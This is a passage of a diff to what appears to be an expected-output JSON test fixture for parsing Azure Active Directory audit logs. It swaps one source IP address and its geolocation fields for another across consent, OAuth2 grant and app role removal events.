+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6851,7 +6767,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 218844,
+ "log.offset": 218760,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6880,9 +6796,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:00",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6974,20 +6890,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6998,8 +6912,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7014,7 +6928,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 224042,
+ "log.offset": 223956,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7043,9 +6957,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7137,20 +7051,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7161,8 +7073,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7177,7 +7089,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 229197,
+ "log.offset": 229109,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7206,9 +7118,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7300,20 +7212,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7324,8 +7234,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7340,7 +7250,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 234395,
+ "log.offset": 234305,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7369,9 +7279,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7463,20 +7373,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7487,8 +7395,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7503,7 +7411,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 239593,
+ "log.offset": 239501,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7532,9 +7440,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7626,20 +7534,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7650,8 +7556,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7666,7 +7572,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 244748,
+ "log.offset": 244654,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7695,9 +7601,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7789,20 +7695,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7813,8 +7717,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7829,7 +7733,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 249903,
+ "log.offset": 249807,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -7858,9 +7762,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7952,20 +7856,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -7976,8 +7878,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:45.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -7992,7 +7894,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 255101,
+ "log.offset": 255003,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8021,9 +7923,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:45",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8115,20 +8017,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8139,8 +8039,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Consent to application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8155,7 +8055,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 260299,
+ "log.offset": 260199,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8184,9 +8084,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8279,20 +8179,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8303,8 +8201,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Consent to application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8319,7 +8217,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 264870,
+ "log.offset": 264768,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8348,9 +8246,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8443,20 +8341,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8467,8 +8363,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8483,7 +8379,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 269441,
+ "log.offset": 269337,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8512,9 +8408,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8606,20 +8502,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8630,8 +8524,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8646,7 +8540,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 274829,
+ "log.offset": 274723,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8675,9 +8569,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8769,20 +8663,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8793,8 +8685,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8809,7 +8701,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 280217,
+ "log.offset": 280109,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -8838,9 +8730,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
